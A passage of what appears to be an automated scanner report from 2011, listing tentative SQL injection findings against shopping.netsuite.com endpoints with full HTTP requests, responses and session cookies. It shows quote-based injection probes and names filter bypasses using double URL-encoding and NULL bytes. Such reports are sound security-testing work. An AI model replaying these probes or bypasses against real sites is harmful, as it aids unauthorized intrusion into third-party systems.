Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.4.10.1303741547; mbox=session#1303736347554-914602#1303745137|PC#1303736347554-914602.17#1366815277|check#true#1303743337; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmb=19239463; __utmc=19239463; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Content-Length: 63

buyid=5051&Submit.x=42&Submit.y=10''&promocode=&c=438708&qtyadd=1

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:43:03 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -2135675922:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 54968

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>

<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...

1.8. http://shopping.netsuite.com/app/site/query/additemtocart.nl [__utmz cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://shopping.netsuite.com
Path:	/app/site/query/additemtocart.nl

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303743154006-383984&productId=5051 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19%2527; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.4.10.1303741547; mbox=session#1303736347554-914602#1303745137|PC#1303736347554-914602.17#1366815277|check#true#1303743337; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmb=19239463; __utmc=19239463; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Content-Length: 63

buyid=5051&Submit.x=41&Submit.y=10&promocode=&c=438708&qtyadd=1

Response 1

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:58:08 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1229899696:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:58:08 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:58:08 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:58:08 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:58:08 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:58:08 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:58:08 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 213

document.write('Error\n');




<!-- Not logging slo
...[SNIP]...

Request 2

POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303743154006-383984&productId=5051 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19%2527%2527; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.4.10.1303741547; mbox=session#1303736347554-914602#1303745137|PC#1303736347554-914602.17#1366815277|check#true#1303743337; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmb=19239463; __utmc=19239463; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Content-Length: 63

buyid=5051&Submit.x=41&Submit.y=10&promocode=&c=438708&qtyadd=1

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Mon, 25 Apr 2011 15:58:09 GMT
Server: Apache
Location: /s.nl?c=438708&n=1&sc=3&ext=T&promocode=&qtyadd=1&mboxSession=1303743154006-383984&Submit.x=41&productId=5051&Submit.y=10&whence=
Expires: 0
NS_RTIMER_COMPOSITE: -2027335596:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:58:10 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:58:10 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:58:10 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:58:10 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:58:10 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 15:58:10 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Length: 0
Content-Type: text/html; charset=utf-8

1.9. http://shopping.netsuite.com/app/site/query/additemtocart.nl [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://shopping.netsuite.com
Path:	/app/site/query/additemtocart.nl

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303743154006-383984&productId=5051 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.4.10.1303741547; mbox=session#1303736347554-914602#1303745137|PC#1303736347554-914602.17#1366815277|check#true#1303743337; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmb=19239463; __utmc=19239463; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Content-Length: 63

buyid=5051&Submit.x=41&Submit.y=10&promocode=&c=438708&qtyadd=1&1%2527=1

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:22:05 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1565681064:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 49112

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>

<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
<td class='smalltext' style='color:#EE0000; background-color: #FFF4F4' >Error: An unexpected error has occurred.</td>
...[SNIP]...

Request 2

POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303743154006-383984&productId=5051 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.4.10.1303741547; mbox=session#1303736347554-914602#1303745137|PC#1303736347554-914602.17#1366815277|check#true#1303743337; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmb=19239463; __utmc=19239463; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Content-Length: 63

buyid=5051&Submit.x=41&Submit.y=10&promocode=&c=438708&qtyadd=1&1%2527%2527=1

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:22:10 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -2135454365:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 55027

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>

<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...

1.10. http://shopping.netsuite.com/app/site/query/additemtocart.nl [productId parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://shopping.netsuite.com
Path:	/app/site/query/additemtocart.nl

Issue detail

The productId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the productId parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303743154006-383984&productId=5051%00'&productId=5051 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.4.10.1303741547; mbox=session#1303736347554-914602#1303745137|PC#1303736347554-914602.17#1366815277|check#true#1303743337; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmb=19239463; __utmc=19239463; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Content-Length: 63

buyid=5051&Submit.x=42&Submit.y=10&promocode=&c=438708&qtyadd=1

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:34:00 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
Last-Modified: Mon, 25 Apr 2011 15:34:02 GMT
NS_RTIMER_COMPOSITE: -804036611:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 4773

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title></title>
<meta name="robots" content="noindex,nofollow">
<script language='JavaScript' type='text/javascript'>
...[SNIP]...

...[SNIP]...

Request 2

POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303743154006-383984&productId=5051%00''&productId=5051 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.4.10.1303741547; mbox=session#1303736347554-914602#1303745137|PC#1303736347554-914602.17#1366815277|check#true#1303743337; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmb=19239463; __utmc=19239463; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Content-Length: 63

buyid=5051&Submit.x=42&Submit.y=10&promocode=&c=438708&qtyadd=1

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:34:07 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 341950918:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 55000

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>

<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...

1.11. http://shopping.netsuite.com/app/site/query/additemtocart.nl [promocode parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://shopping.netsuite.com
Path:	/app/site/query/additemtocart.nl

Issue detail

The promocode parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the promocode parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303743154006-383984&productId=5051 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.4.10.1303741547; mbox=session#1303736347554-914602#1303745137|PC#1303736347554-914602.17#1366815277|check#true#1303743337; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmb=19239463; __utmc=19239463; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Content-Length: 63

buyid=5051&Submit.x=41&Submit.y=10&promocode='&c=438708&qtyadd=1

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:44:26 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -2027412727:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 49126

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>

<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
<td class='smalltext' style='color:#EE0000; background-color: #FFF4F4' >Error: An unexpected error has occurred.</td>
...[SNIP]...

Request 2

POST /app/site/query/additemtocart.nl?n=1&ext=T&mboxSession=1303743154006-383984&productId=5051 HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
Cache-Control: max-age=0
Origin: http://www.eset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmc=1; __utmb=1.4.10.1303741547; mbox=session#1303736347554-914602#1303745137|PC#1303736347554-914602.17#1366815277|check#true#1303743337; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmb=19239463; __utmc=19239463; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)
Content-Length: 63

buyid=5051&Submit.x=41&Submit.y=10&promocode=''&c=438708&qtyadd=1

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:44:32 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -101878775:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 54942

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>

<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...

1.12. http://shopping.netsuite.com/s.nl [NLShopperId cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://shopping.netsuite.com
Path:	/s.nl

Issue detail

The NLShopperId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the NLShopperId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /s.nl?sc=3&c=438708&n=1&ext=T HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS'; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmb=1.3.10.1303741547; __utmc=1; mbox=session#1303736347554-914602#1303744976|PC#1303736347554-914602.17#1304952716|check#true#1303743176

Response 1

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:27:33 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: 1121445976:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 48758

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>ESET Shopping Cart - ESET North America</title>

<script type="text/javascript">
var gaJsHost = (("https:" =
...[SNIP]...
<td class='smalltext' style='color:#EE0000; background-color: #FFF4F4' >Error: An unexpected error has occurred.</td>
...[SNIP]...

Request 2

GET /s.nl?sc=3&c=438708&n=1&ext=T HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NLVisitorId=rcHW8415AZeYvnmq; NS_VER=2011.1.0; NLPromocode=438708_; promocode=; __utmz=1.1303741547.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; JSESSIONID=2DLnN1GCXvm8dsKqy6fxH1QMnQLcnWNYqQ8GfWfpDvqQz7fWLKytdyYLhnhfDMHf5LGp6G29thqTJF1Yr0chHQ8X9vLpm7hsbZGqn54h5rTx8TlXlTwfhB5yq9cyS8Sm!-2139436563; NLShopperId=rcHW8415AciYvvMS''; bn_u=6923519460848807096; __utma=1.1117720747.1303736410.1303736410.1303741547.2; __utmb=1.3.10.1303741547; __utmc=1; mbox=session#1303736347554-914602#1303744976|PC#1303736347554-914602.17#1304952716|check#true#1303743176

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:27:36 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
